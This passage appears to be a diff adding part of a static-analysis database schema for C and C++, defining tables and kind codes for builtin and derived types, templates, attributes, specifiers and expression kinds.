@long_long +| 18 = @unsigned_long_long +| 19 = @signed_long_long +// ... 20 Microsoft-specific __int8 +// ... 21 Microsoft-specific __int16 +// ... 22 Microsoft-specific __int32 +// ... 23 Microsoft-specific __int64 +| 24 = @float +| 25 = @double +| 26 = @long_double +| 27 = @complex_float // C99-specific _Complex float +| 28 = @complex_double // C99-specific _Complex double +| 29 = @complex_long_double // C99-specific _Complex long double +| 30 = @imaginary_float // C99-specific _Imaginary float +| 31 = @imaginary_double // C99-specific _Imaginary double +| 32 = @imaginary_long_double // C99-specific _Imaginary long double +| 33 = @wchar_t // Microsoft-specific +| 34 = @decltype_nullptr // C++11 +| 35 = @int128 // __int128 +| 36 = @unsigned_int128 // unsigned __int128 +| 37 = @signed_int128 // signed __int128 +| 38 = @float128 // __float128 +| 39 = @complex_float128 // _Complex __float128 +// ... 40 _Decimal32 +// ... 41 _Decimal64 +// ... 42 _Decimal128 +| 43 = @char16_t +| 44 = @char32_t +| 45 = @std_float32 // _Float32 +| 46 = @float32x // _Float32x +| 47 = @std_float64 // _Float64 +| 48 = @float64x // _Float64x +| 49 = @std_float128 // _Float128 +// ... 50 _Float128x +| 51 = @char8_t +| 52 = @float16 // _Float16 +| 53 = @complex_float16 // _Complex _Float16 +| 54 = @fp16 // __fp16 +| 55 = @std_bfloat16 // __bf16 +| 56 = @std_float16 // std::float16_t +| 57 = @complex_std_float32 // _Complex _Float32 +| 58 = @complex_float32x // _Complex _Float32x +| 59 = @complex_std_float64 // _Complex _Float64 +| 60 = @complex_float64x // _Complex _Float64x +| 61 = @complex_std_float128 // _Complex _Float128 +| 62 = @mfp8 // __mfp8 +| 63 = @scalable_vector_count // __SVCount_t +| 64 = @complex_fp16 // _Complex __fp16 +| 65 = @complex_std_bfloat16 // _Complex __bf16 +| 66 = @complex_std_float16 // _Complex std::float16_t +; + +builtintypes( + unique int id: @builtintype, + string name: string ref, + int kind: int ref, + int size: int ref, + int sign: int ref, + int alignment: int ref +); + +/** + * Derived types are types that are directly derived from existing types and + * point to, refer to, transform type data to return a new type. + */ +case @derivedtype.kind of + 1 = @pointer +| 2 = @reference +| 3 = @type_with_specifiers +| 4 = @array +| 5 = @gnu_vector +| 6 = @routineptr +| 7 = @routinereference +| 8 = @rvalue_reference // C++11 +// ... 9 type_conforming_to_protocols deprecated +| 10 = @block +| 11 = @scalable_vector // Arm SVE +; + +derivedtypes( + unique int id: @derivedtype, + string name: string ref, + int kind: int ref, + int type_id: @type ref +); + +pointerishsize(unique int id: @derivedtype ref, + int size: int ref, + int alignment: int ref); + +arraysizes( + unique int id: @derivedtype ref, + int num_elements: int ref, + int bytesize: int ref, + int alignment: int ref +); + +tupleelements( + unique int id: @derivedtype ref, + int num_elements: int ref +); + +typedefbase( + unique int id: @usertype ref, + int type_id: @type ref +); + +/** + * An instance of the C++11 `decltype` operator or C23 `typeof`/`typeof_unqual` + * operator taking an expression as its argument. For example: + * ``` + * int a; + * decltype(1+a) b; + * typeof(1+a) c; + * ``` + * Here `expr` is `1+a`. + * + * Sometimes an additional pair of parentheses around the expression + * changes the semantics of the decltype, e.g. + * ``` + * struct A { double x; }; + * const A* a = new A(); + * decltype( a->x ); // type is double + * decltype((a->x)); // type is const double& + * ``` + * (Please consult the C++11 standard for more details). + * `parentheses_would_change_meaning` is `true` iff that is the case. + */ + +/* +case @decltype.kind of +| 0 = @decltype +| 1 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +; +*/ + +#keyset[id, expr] +decltypes( + int id: @decltype, + int expr: @expr ref, + int kind: int ref, + int base_type: @type ref, + boolean parentheses_would_change_meaning: boolean ref +); + +case @type_operator.kind of + 0 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +| 1 = @underlying_type +| 2 = @bases +| 3 = @direct_bases +| 4 = @add_lvalue_reference +| 5 = @add_pointer +| 6 = @add_rvalue_reference +| 7 = @decay +| 8 = @make_signed +| 9 = @make_unsigned +| 10 = @remove_all_extents +| 11 = @remove_const +| 12 = @remove_cv +| 13 = @remove_cvref +| 14 = @remove_extent +| 15 = @remove_pointer +| 16 = @remove_reference_t +| 17 = @remove_restrict +| 18 = @remove_volatile +| 19 = @remove_reference +; + +type_operators( + unique int id: @type_operator, + int arg_type: @type ref, + int kind: int ref, + int base_type: @type ref +) + +case @usertype.kind of + 0 = @unknown_usertype +| 1 = @struct +| 2 = @class +| 3 = @union +| 4 = @enum +// ... 5 = @typedef deprecated // classic C: typedef typedef type name +// ... 6 = @template deprecated +| 7 = @template_parameter +| 8 = @template_template_parameter +| 9 = @proxy_class // a proxy class associated with a template parameter +// ... 10 objc_class deprecated +// ... 11 objc_protocol deprecated +// ... 12 objc_category deprecated +| 13 = @scoped_enum +// ... 14 = @using_alias deprecated // a using name = type style typedef +| 15 = @template_struct +| 16 = @template_class +| 17 = @template_union +| 18 = @alias +; + +usertypes( + unique int id: @usertype, + string name: string ref, + int kind: int ref +); + +usertypesize( + unique int id: @usertype ref, + int size: int ref, + int alignment: int ref +); + +usertype_final(unique int id: @usertype ref); + +usertype_uuid( + unique int id: @usertype ref, + string uuid: string ref +); + +/* +case @usertype.alias_kind of +| 0 = @typedef +| 1 = @alias +*/ + +usertype_alias_kind( + int id: @usertype ref, + int alias_kind: int ref +) + +nontype_template_parameters( + int id: @expr ref +); + +type_template_type_constraint( + int id: @usertype ref, + int constraint: @expr ref +); + +mangled_name( + unique int id: @declaration ref, + int mangled_name : @mangledname, + boolean is_complete: boolean ref +); + +is_pod_class(unique int id: @usertype ref); +is_standard_layout_class(unique int id: @usertype ref); + +is_complete(unique int id: @usertype ref); + +is_class_template(unique int id: @usertype ref); +class_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +class_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +class_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +class_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +) + +@user_or_decltype = @usertype | @decltype; + +is_proxy_class_for( + unique int id: @usertype ref, + int templ_param_id: @user_or_decltype ref +); + +type_mentions( + unique int id: @type_mention, + int type_id: @type ref, + int location: @location_default ref, + // a_symbol_reference_kind from the frontend. + int kind: int ref +); + +is_function_template(unique int id: @function ref); +function_instantiation( + unique int to: @function ref, + int from: @function ref +); +function_template_argument( + int function_id: @function ref, + int index: int ref, + int arg_type: @type ref +); +function_template_argument_value( + int function_id: @function ref, + int index: int ref, + int arg_value: @expr ref +); +function_template_generated_from( + unique int template: @function ref, + int from: @function ref +); + +is_variable_template(unique int id: @variable ref); +variable_instantiation( + unique int to: @variable ref, + int from: @variable ref +); +variable_template_argument( + int variable_id: @variable ref, + int index: int ref, + int arg_type: @type ref +); +variable_template_argument_value( + int variable_id: @variable ref, + int index: int ref, + int arg_value: @expr ref +); +variable_template_generated_from( + unique int template: @variable ref, + int from: @variable ref +); + +is_alias_template(unique int id: @usertype ref); +alias_instantiation( + unique int to: @usertype ref, + int from: @usertype ref +); +alias_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +alias_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +alias_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +); + +template_template_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +template_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +template_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); + +@concept = @concept_template | @concept_id; + +concept_templates( + unique int concept_id: @concept_template, + string name: string ref, + int location: @location_default ref +); +concept_instantiation( + unique int to: @concept_id ref, + int from: @concept_template ref +); +is_type_constraint(int concept_id: @concept_id ref); +concept_template_argument( + int concept_id: @concept ref, + int index: int ref, + int arg_type: @type ref +); +concept_template_argument_value( + int concept_id: @concept ref, + int index: int ref, + int arg_value: @expr ref +); + +routinetypes( + unique int id: @routinetype, + int return_type: @type ref +); + +routinetypeargs( + int routine: @routinetype ref, + int index: int ref, + int type_id: @type ref +); + +ptrtomembers( + unique int id: @ptrtomember, + int type_id: @type ref, + int class_id: @type ref +); + +/* + specifiers for types, functions, and variables + + "public", + "protected", + "private", + + "const", + "volatile", + "static", + + "pure", + "virtual", + "sealed", // Microsoft + "__interface", // Microsoft + "inline", + "explicit", + + "near", // near far extension + "far", // near far extension + "__ptr32", // Microsoft + "__ptr64", // Microsoft + "__sptr", // Microsoft + "__uptr", // Microsoft + "dllimport", // Microsoft + "dllexport", // Microsoft + "thread", // Microsoft + "naked", // Microsoft + "microsoft_inline", // Microsoft + "forceinline", // Microsoft + "selectany", // Microsoft + "nothrow", // Microsoft + "novtable", // Microsoft + "noreturn", // Microsoft + "noinline", // Microsoft + "noalias", // Microsoft + "restrict", // Microsoft +*/ + +specifiers( + unique int id: @specifier, + unique string str: string ref +); + +typespecifiers( + int type_id: @type ref, + int spec_id: @specifier ref +); + +funspecifiers( + int func_id: @function ref, + int spec_id: @specifier ref +); + +varspecifiers( + int var_id: @accessible ref, + int spec_id: @specifier ref +); + +explicit_specifier_exprs( + unique int func_id: @function ref, + int constant: @expr ref +) + +attributes( + unique int id: @attribute, + int kind: int ref, + string name: string ref, + string name_space: string ref, + int location: @location_default ref +); + +case @attribute.kind of + 0 = @gnuattribute +| 1 = @stdattribute +| 2 = @declspec +| 3 = @msattribute +| 4 = @alignas +// ... 5 @objc_propertyattribute deprecated +; + +attribute_args( + unique int id: @attribute_arg, + int kind: int ref, + int attribute: @attribute ref, + int index: int ref, + int location: @location_default ref +); + +case @attribute_arg.kind of + 0 = @attribute_arg_empty +| 1 = @attribute_arg_token +| 2 = @attribute_arg_constant +| 3 = @attribute_arg_type +| 4 = @attribute_arg_constant_expr +| 5 = @attribute_arg_expr +; + +attribute_arg_value( + unique int arg: @attribute_arg ref, + string value: string ref +); +attribute_arg_type( + unique int arg: @attribute_arg ref, + int type_id: @type ref +); +attribute_arg_constant( + unique int arg: @attribute_arg ref, + int constant: @expr ref +) +attribute_arg_expr( + unique int arg: @attribute_arg ref, + int expr: @expr ref +) +attribute_arg_name( + unique int arg: @attribute_arg ref, + string name: string ref +); + +typeattributes( + int type_id: @type ref, + int spec_id: @attribute ref +); + +funcattributes( + int func_id: @function ref, + int spec_id: @attribute ref +); + +varattributes( + int var_id: @accessible ref, + int spec_id: @attribute ref +); + +namespaceattributes( + int namespace_id: @namespace ref, + int spec_id: @attribute ref +); + +stmtattributes( + int stmt_id: @stmt ref, + int spec_id: @attribute ref +); + +@type = @builtintype + | @derivedtype + | @usertype + | @routinetype + | @ptrtomember + | @decltype + | @type_operator; + +unspecifiedtype( + unique int type_id: @type ref, + int unspecified_type_id: @type ref +); + +member( + int parent: @type ref, + int index: int ref, + int child: @member ref +); + +@enclosingfunction_child = @usertype | @variable | @namespace + +enclosingfunction( + unique int child: @enclosingfunction_child ref, + int parent: @function ref +); + +derivations( + unique int derivation: @derivation, + int sub: @type ref, + int index: int ref, + int super: @type ref, + int location: @location_default ref +); + +derspecifiers( + int der_id: @derivation ref, + int spec_id: @specifier ref +); + +/** + * Contains the byte offset of the base class subobject within the derived + * class. Only holds for non-virtual base classes, but see table + * `virtual_base_offsets` for offsets of virtual base class subobjects. + */ +direct_base_offsets( + unique int der_id: @derivation ref, + int offset: int ref +); + +/** + * Contains the byte offset of the virtual base class subobject for class + * `super` within a most-derived object of class `sub`. `super` can be either a + * direct or indirect base class. + */ +#keyset[sub, super] +virtual_base_offsets( + int sub: @usertype ref, + int super: @usertype ref, + int offset: int ref +); + +frienddecls( + unique int id: @frienddecl, + int type_id: @type ref, + int decl_id: @declaration ref, + int location: @location_default ref +); + +@declaredtype = @usertype ; + +@declaration = @function + | @declaredtype + | @variable + | @enumconstant + | @frienddecl + | @concept_template; + +@member = @membervariable + | @function + | @declaredtype + | @enumconstant; + +@locatable = @diagnostic + | @declaration + | @ppd_include + | @ppd_define + | @macroinvocation + /*| @funcall*/ + | @xmllocatable + | @attribute + | @attribute_arg; + +@namedscope = @namespace | @usertype; + +@element = @locatable + | @file + | @folder + | @specifier + | @type + | @expr + | @namespace + | @initialiser + | @stmt + | @derivation + | @comment + | @preprocdirect + | @fun_decl + | @var_decl + | @type_decl + | @namespace_decl + | @using + | @namequalifier + | @specialnamequalifyingelement + | @static_assert + | @type_mention + | @lambdacapture; + +@exprparent = @element; + +comments( + unique int id: @comment, + string contents: string ref, + int location: @location_default ref +); + +commentbinding( + int id: @comment ref, + int element: @element ref +); + +exprconv( + int converted: @expr ref, + unique int conversion: @expr ref +); + +compgenerated(unique int id: @element ref); + +/** + * `destructor_call` destructs the `i`'th entity that should be + * destructed following `element`. Note that entities should be + * destructed in reverse construction order, so for a given `element` + * these should be called from highest to lowest `i`. + */ +#keyset[element, destructor_call] +#keyset[element, i] +synthetic_destructor_call( + int element: @element ref, + int i: int ref, + int destructor_call: @routineexpr ref +); + +namespaces( + unique int id: @namespace, + string name: string ref +); + +namespace_inline( + unique int id: @namespace ref +); + +namespacembrs( + int parentid: @namespace ref, + unique int memberid: @namespacembr ref +); + +@namespacembr = @declaration | @namespace; + +exprparents( + int expr_id: @expr ref, + int child_index: int ref, + int parent_id: @exprparent ref +); + +expr_isload(unique int expr_id: @expr ref); + +@cast = @c_style_cast + | @const_cast + | @dynamic_cast + | @reinterpret_cast + | @static_cast + ; + +/* +case @conversion.kind of + 0 = @simple_conversion // a numeric conversion, qualification conversion, or a reinterpret_cast +| 1 = @bool_conversion // conversion to 'bool' +| 2 = @base_class_conversion // a derived-to-base conversion +| 3 = @derived_class_conversion // a base-to-derived conversion +| 4 = @pm_base_class_conversion // a derived-to-base conversion of a pointer to member +| 5 = @pm_derived_class_conversion // a base-to-derived conversion of a pointer to member +| 6 = @glvalue_adjust // an adjustment of the type of a glvalue +| 7 = @prvalue_adjust // an adjustment of the type of a prvalue +; +*/ +/** + * Describes the semantics represented by a cast expression. This is largely + * independent of the source syntax of the cast, so it is separate from the + * regular expression kind. + */ +conversionkinds( + unique int expr_id: @cast ref, + int kind: int ref +); + +@conversion = @cast + | @array_to_pointer + | @parexpr + | @reference_to + | @ref_indirect + | @temp_init + | @c11_generic + ; + +/* +case @funbindexpr.kind of + 0 = @normal_call // a normal call +| 1 = @virtual_call // a virtual call +| 2 = @adl_call // a call whose target is only found by ADL +; +*/ +iscall( + unique int caller: @funbindexpr ref, + int kind: int ref +); + +numtemplatearguments( + unique int expr_id: @expr ref, + int num: int ref +); + +specialnamequalifyingelements( + unique int id: @specialnamequalifyingelement, + unique string name: string ref +); + +@namequalifiableelement = @expr | @namequalifier; +@namequalifyingelement = @namespace + | @specialnamequalifyingelement + | @usertype + | @decltype + | @derivedtype; + +namequalifiers( + unique int id: @namequalifier, + unique int qualifiableelement: @namequalifiableelement ref, + int qualifyingelement: @namequalifyingelement ref, + int location: @location_default ref +); + +varbind( + int expr: @varbindexpr ref, + int var: @accessible ref +); + +funbind( + int expr: @funbindexpr ref, + int fun: @function ref +); + +@any_new_expr = @new_expr + | @new_array_expr; + +@new_or_delete_expr = @any_new_expr + | @delete_expr + | @delete_array_expr; + +@prefix_crement_expr = @preincrexpr | @predecrexpr; + +@postfix_crement_expr = @postincrexpr | @postdecrexpr; + +@increment_expr = @preincrexpr | @postincrexpr; + +@decrement_expr = @predecrexpr | @postdecrexpr; + +@crement_expr = @increment_expr | @decrement_expr; + +@un_arith_op_expr = @arithnegexpr + | @unaryplusexpr + | @conjugation + | @realpartexpr + | @imagpartexpr + | @crement_expr + ; + +@un_bitwise_op_expr = @complementexpr; + +@un_log_op_expr = @notexpr; + +@un_op_expr = @address_of + | @indirect + | @un_arith_op_expr + | @un_bitwise_op_expr + | @builtinaddressof + | @vec_fill + | @un_log_op_expr + | @co_await + | @co_yield + ; + +@bin_log_op_expr = @andlogicalexpr | @orlogicalexpr; + +@cmp_op_expr = @eq_op_expr | @rel_op_expr; + +@eq_op_expr = @eqexpr | @neexpr; + +@rel_op_expr = @gtexpr + | @ltexpr + | @geexpr + | @leexpr + | @spaceshipexpr + ; + +@bin_bitwise_op_expr = @lshiftexpr + | @rshiftexpr + | @andexpr + | @orexpr + | @xorexpr + ; + +@p_arith_op_expr = @paddexpr + | @psubexpr + | @pdiffexpr + ; + +@bin_arith_op_expr = @addexpr + | @subexpr + | @mulexpr + | @divexpr + | @remexpr + | @jmulexpr + | @jdivexpr + | @fjaddexpr + | @jfaddexpr + | @fjsubexpr + | @jfsubexpr + | @minexpr + | @maxexpr + | @p_arith_op_expr + ; + +@bin_op_expr = @bin_arith_op_expr + | @bin_bitwise_op_expr + | @cmp_op_expr + | @bin_log_op_expr + ; + +@op_expr = @un_op_expr + | @bin_op_expr + | @assign_expr + | @conditionalexpr + ; + +@assign_arith_expr = @assignaddexpr + | @assignsubexpr + | @assignmulexpr + | @assigndivexpr + | @assignremexpr + ; + +@assign_bitwise_expr = @assignandexpr + | @assignorexpr + | @assignxorexpr + | @assignlshiftexpr + | @assignrshiftexpr + ; + +@assign_pointer_expr = @assignpaddexpr + | @assignpsubexpr + ; + +@assign_op_expr = @assign_arith_expr + | @assign_bitwise_expr + | @assign_pointer_expr + ; + +@assign_expr = @assignexpr | @assign_op_expr | @blockassignexpr + +/* + Binary encoding of the allocator form. + + case @allocator.form of + 0 = plain + | 1 = alignment + ; +*/ + +/** + * The allocator function associated with a `new` or `new[]` expression. + * The `form` column specified whether the allocation call contains an alignment + * argument. + */ +expr_allocator( + unique int expr: @any_new_expr ref, + int func: @function ref, + int form: int ref +); + +/* + Binary encoding of the deallocator form. + + case @deallocator.form of + 0 = plain + | 1 = size + | 2 = alignment + | 4 = destroying_delete + ; +*/ + +/** + * The deallocator function associated with a `delete`, `delete[]`, `new`, or + * `new[]` expression. For a `new` or `new[]` expression, the deallocator is the + * one used to free memory if the initialization throws an exception. + * The `form` column specifies whether the deallocation call contains a size + * argument, and alignment argument, or both. + */ +expr_deallocator( + unique int expr: @new_or_delete_expr ref, + int func: @function ref, + int form: int ref +); + +/** + * Holds if the `@conditionalexpr` is of the two operand form + * `guard ? : false`. + */ +expr_cond_two_operand( + unique int cond: @conditionalexpr ref +); + +/** + * The guard of `@conditionalexpr` `guard ? true : false` + */ +expr_cond_guard( + unique int cond: @conditionalexpr ref, + int guard: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` holds. For the two operand form + * `guard ?: false` consider using `expr_cond_guard` instead. + */ +expr_cond_true( + unique int cond: @conditionalexpr ref, + int true: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` does not hold. + */ +expr_cond_false( + unique int cond: @conditionalexpr ref, + int false: @expr ref +); + +/** A string representation of the value. */ +values( + unique int id: @value, + string str: string ref +); + +/** The actual text in the source code for the value, if any. */ +valuetext( + unique int id: @value ref, + string text: string ref +); + +valuebind( + int val: @value ref, + unique int expr: @expr ref +); + +fieldoffsets( + unique int id: @variable ref, + int byteoffset: int ref, + int bitoffset: int ref +); + +bitfield( + unique int id: @variable ref, + int bits: int ref, + int declared_bits: int ref +); + +/* TODO +memberprefix( + int member: @expr ref, + int prefix: @expr ref +); +*/ + +/* + kind(1) = mbrcallexpr + kind(2) = mbrptrcallexpr + kind(3) = mbrptrmbrcallexpr + kind(4) = ptrmbrptrmbrcallexpr + kind(5) = mbrreadexpr // x.y + kind(6) = mbrptrreadexpr // p->y + kind(7) = mbrptrmbrreadexpr // x.*pm + kind(8) = mbrptrmbrptrreadexpr // x->*pm + kind(9) = staticmbrreadexpr // static x.y + kind(10) = staticmbrptrreadexpr // static p->y +*/ +/* TODO +memberaccess( + int member: @expr ref, + int kind: int ref +); +*/ + +initialisers( + unique int init: @initialiser, + int var: @accessible ref, + unique int expr: @expr ref, + int location: @location_default ref +); + +braced_initialisers( + int init: @initialiser ref +); + +/** + * An ancestor for the expression, for cases in which we cannot + * otherwise find the expression's parent. + */ +expr_ancestor( + int exp: @expr ref, + int ancestor: @element ref +); + +exprs( + unique int id: @expr, + int kind: int ref, + int location: @location_default ref +); + +expr_reuse( + int reuse: @expr ref, + int original: @expr ref, + int value_category: int ref +) + +/* + case @value.category of + 1 = prval + | 2 = xval + | 3 = lval + ; +*/ +expr_types( + int id: @expr ref, + int typeid: @type ref, + int value_category: int ref +); + +case @expr.kind of + 1 = @errorexpr +| 2 = @address_of // & AddressOfExpr +| 3 = @reference_to // ReferenceToExpr (implicit?) +| 4 = @indirect // * PointerDereferenceExpr +| 5 = @ref_indirect // ReferenceDereferenceExpr (implicit?) +// ... +| 8 = @array_to_pointer // (???) +| 9 = @vacuous_destructor_call // VacuousDestructorCall +// ... +| 11 = @assume // Microsoft +| 12 = @parexpr +| 13 = @arithnegexpr +| 14 = @unaryplusexpr +| 15 = @complementexpr +| 16 = @notexpr +| 17 = @conjugation // GNU ~ operator +| 18 = @realpartexpr // GNU __real +| 19 = @imagpartexpr // GNU __imag +| 20 = @postincrexpr +| 21 = @postdecrexpr +| 22 = @preincrexpr +| 23 = @predecrexpr +| 24 = @conditionalexpr +| 25 = @addexpr +| 26 = @subexpr +| 27 = @mulexpr +| 28 = @divexpr +| 29 = @remexpr +| 30 = @jmulexpr // C99 mul imaginary +| 31 = @jdivexpr // C99 div imaginary +| 32 = @fjaddexpr // C99 add real + imaginary +| 33 = @jfaddexpr // C99 add imaginary + real +| 34 = @fjsubexpr // C99 sub real - imaginary +| 35 = @jfsubexpr // C99 sub imaginary - real +| 36 = @paddexpr // pointer add (pointer + int or int + pointer) +| 37 = @psubexpr // pointer sub (pointer - integer) +| 38 = @pdiffexpr // difference between two pointers +| 39 = @lshiftexpr +| 40 = @rshiftexpr +| 41 = @andexpr +| 42 = @orexpr +| 43 = @xorexpr +| 44 = @eqexpr +| 45 = @neexpr +| 46 = @gtexpr +| 47 = @ltexpr +| 48 = @geexpr +| 49 = @leexpr +| 50 = @minexpr // GNU minimum +| 51 = @maxexpr // GNU maximum +| 52 = @assignexpr +| 53 = @assignaddexpr +| 54 = @assignsubexpr +| 55 = @assignmulexpr +| 56 = @assigndivexpr +| 57 = @assignremexpr +| 58 = @assignlshiftexpr +| 59 = @assignrshiftexpr +| 60 = @assignandexpr +| 61 = @assignorexpr +| 62 = @assignxorexpr +| 63 = @assignpaddexpr // assign pointer add +| 64 = @assignpsubexpr // assign pointer sub +| 65 = @andlogicalexpr +| 66 = @orlogicalexpr +| 67 = @commaexpr +| 68 = @subscriptexpr // access to member of an array, e.g., a[5] +// ... 69 @objc_subscriptexpr deprecated +// ... 70 @cmdaccess deprecated +// ... +| 73 = @virtfunptrexpr +| 74 = @callexpr +// ... 75 @msgexpr_normal deprecated +// ... 76 @msgexpr_super deprecated +// ... 77 @atselectorexpr deprecated +// ... 78 @atprotocolexpr deprecated +| 79 = @vastartexpr +| 80 = @vaargexpr +| 81 = @vaendexpr +| 82 = @vacopyexpr +// ... 83 @atencodeexpr deprecated +| 84 = @varaccess +| 85 = @thisaccess +// ... 86 @objc_box_expr deprecated +| 87 = @new_expr +| 88 = @delete_expr +| 89 = @throw_expr +| 90 = @condition_decl // a variable declared in a condition, e.g., if(int x = y > 2) +| 91 = @braced_init_list +| 92 = @type_id +| 93 = @runtime_sizeof +| 94 = @runtime_alignof +| 95 = @sizeof_pack +| 96 = @expr_stmt // GNU extension +| 97 = @routineexpr +| 98 = @type_operand // used to access a type in certain contexts (haven't found any examples yet....) +| 99 = @offsetofexpr // offsetof ::= type and field +| 100 = @hasassignexpr // __has_assign ::= type +| 101 = @hascopyexpr // __has_copy ::= type +| 102 = @hasnothrowassign // __has_nothrow_assign ::= type +| 103 = @hasnothrowconstr // __has_nothrow_constructor ::= type +| 104 = @hasnothrowcopy // __has_nothrow_copy ::= type +| 105 = @hastrivialassign // __has_trivial_assign ::= type +| 106 = @hastrivialconstr // __has_trivial_constructor ::= type +| 107 = @hastrivialcopy // __has_trivial_copy ::= type +| 108 = @hasuserdestr // __has_user_destructor ::= type +| 109 = @hasvirtualdestr // __has_virtual_destructor ::= type +| 110 = @isabstractexpr // __is_abstract ::= type +| 111 = @isbaseofexpr // __is_base_of ::= type type +| 112 = @isclassexpr // __is_class ::= type +| 113 = @isconvtoexpr // __is_convertible_to ::= type type +| 114 = @isemptyexpr // __is_empty ::= type +| 115 = @isenumexpr // __is_enum ::= type +| 116 = @ispodexpr // __is_pod ::= type +| 117 = @ispolyexpr // __is_polymorphic ::= type +| 118 = @isunionexpr // __is_union ::= type +| 119 = @typescompexpr // GNU __builtin_types_compatible ::= type type +| 120 = @intaddrexpr // frontend internal builtin, used to implement offsetof +// ... +| 122 = @hastrivialdestructor // __has_trivial_destructor ::= type +| 123 = @literal +| 124 = @uuidof +| 127 = @aggregateliteral +| 128 = @delete_array_expr +| 129 = @new_array_expr +// ... 130 @objc_array_literal deprecated +// ... 131 @objc_dictionary_literal deprecated +| 132 = @foldexpr +// ... +| 200 = @ctordirectinit +| 201 = @ctorvirtualinit +| 202 = @ctorfieldinit +| 203 = @ctordelegatinginit +| 204 = @dtordirectdestruct +| 205 = @dtorvirtualdestruct +| 206 = @dtorfielddestruct +// ... +| 210 = @static_cast +| 211 = @reinterpret_cast +| 212 = @const_cast +| 213 = @dynamic_cast +| 214 = @c_style_cast +| 215 = @lambdaexpr +| 216 = @param_ref +| 217 = @noopexpr +// ... +| 294 = @istriviallyconstructibleexpr +| 295 = @isdestructibleexpr +| 296 = @isnothrowdestructibleexpr +| 297 = @istriviallydestructibleexpr +| 298 = @istriviallyassignableexpr +| 299 = @isnothrowassignableexpr +| 300 = @istrivialexpr +| 301 = @isstandardlayoutexpr +| 302 = @istriviallycopyableexpr +| 303 = @isliteraltypeexpr +| 304 = @hastrivialmoveconstructorexpr +| 305 = @hastrivialmoveassignexpr +| 306 = @hasnothrowmoveassignexpr +| 307 = @isconstructibleexpr +| 308 = @isnothrowconstructibleexpr +| 309 = @hasfinalizerexpr +| 310 = @isdelegateexpr +| 311 = @isinterfaceclassexpr +| 312 = @isrefarrayexpr +| 313 = @isrefclassexpr +| 314 = @issealedexpr +| 315 = @issimplevalueclassexpr +| 316 = @isvalueclassexpr +| 317 = @isfinalexpr +| 319 = @noexceptexpr +| 320 = @builtinshufflevector +| 321 = @builtinchooseexpr +| 322 = @builtinaddressof +| 323 = @vec_fill +| 324 = @builtinconvertvector +| 325 = @builtincomplex +| 326 = @spaceshipexpr +| 327 = @co_await +| 328 = @co_yield +| 329 = @temp_init +| 330 = @isassignable +| 331 = @isaggregate +| 332 = @hasuniqueobjectrepresentations +| 333 = @builtinbitcast +| 334 = @builtinshuffle +| 335 = @blockassignexpr +| 336 = @issame +| 337 = @isfunction +| 338 = @islayoutcompatible +| 339 = @ispointerinterconvertiblebaseof +| 340 = @isarray +| 341 = @arrayrank +| 342 = @arrayextent +| 343 = @isarithmetic +| 344 = @iscompletetype +| 345 = @iscompound +| 346 = @isconst +| 347 = @isfloatingpoint +| 348 = @isfundamental +| 349 = @isintegral +| 350 = @islvaluereference +| 351 = @ismemberfunctionpointer +| 352 = @ismemberobjectpointer +| 353 = @ismemberpointer +| 354 = @isobject +| 355 = @ispointer +| 356 = @isreference +| 357 = @isrvaluereference +| 358 = @isscalar +| 359 = @issigned +| 360 = @isunsigned +| 361 = @isvoid +| 362 = @isvolatile +| 363 = @reuseexpr +| 364 = @istriviallycopyassignable +| 365 = @isassignablenopreconditioncheck +| 366 = @referencebindstotemporary +| 367 = @issameas +| 368 = @builtinhasattribute +| 369 = @ispointerinterconvertiblewithclass +| 370 = @builtinispointerinterconvertiblewithclass +| 371 = @iscorrespondingmember +| 372 = @builtiniscorrespondingmember +| 373 = @isboundedarray +| 374 = @isunboundedarray +| 375 = @isreferenceable +| 378 = @isnothrowconvertible +| 379 = @referenceconstructsfromtemporary +| 380 = @referenceconvertsfromtemporary +| 381 = @isconvertible +| 382 = @isvalidwinrttype +| 383 = @iswinclass +| 384 = @iswininterface +| 385 = @istriviallyequalitycomparable +| 386 = @isscopedenum +| 387 = @istriviallyrelocatable +| 388 = @datasizeof +| 389 = @c11_generic +| 390 = @requires_expr +| 391 = @nested_requirement +| 392 = @compound_requirement +| 393 = @concept_id +| 394 = @isinvocable +| 395 = @isnothrowinvocable +| 396 = @isbitwisecloneable +; + +@var_args_expr = @vastartexpr + | @vaendexpr + | @vaargexpr + | @vacopyexpr + ; + +@builtin_op = @var_args_expr + | @noopexpr + | @offsetofexpr + | @intaddrexpr + | @hasassignexpr + | @hascopyexpr + | @hasnothrowassign + | @hasnothrowconstr + | @hasnothrowcopy + | @hastrivialassign + | @hastrivialconstr + | @hastrivialcopy + | @hastrivialdestructor + | @hasuserdestr + | @hasvirtualdestr + | @isabstractexpr + | @isbaseofexpr + | @isclassexpr + | @isconvtoexpr + | @isemptyexpr + | @isenumexpr + | @ispodexpr + | @ispolyexpr + | @isunionexpr + | @typescompexpr + | @builtinshufflevector + | @builtinconvertvector + | @builtinaddressof + | @istriviallyconstructibleexpr + | @isdestructibleexpr + | @isnothrowdestructibleexpr + | @istriviallydestructibleexpr + | @istriviallyassignableexpr + | @isnothrowassignableexpr + | @istrivialexpr + | @isstandardlayoutexpr + | @istriviallycopyableexpr + | @isliteraltypeexpr + | @hastrivialmoveconstructorexpr + | @hastrivialmoveassignexpr + | @hasnothrowmoveassignexpr + | @isconstructibleexpr + | @isnothrowconstructibleexpr + | @hasfinalizerexpr + | @isdelegateexpr + | @isinterfaceclassexpr + | @isrefarrayexpr + | @isrefclassexpr + | @issealedexpr + | @issimplevalueclassexpr + | @isvalueclassexpr + | @isfinalexpr + | @builtinchooseexpr + | @builtincomplex + | @isassignable + | @isaggregate + | @hasuniqueobjectrepresentations + | @builtinbitcast + | @builtinshuffle + | @issame + | 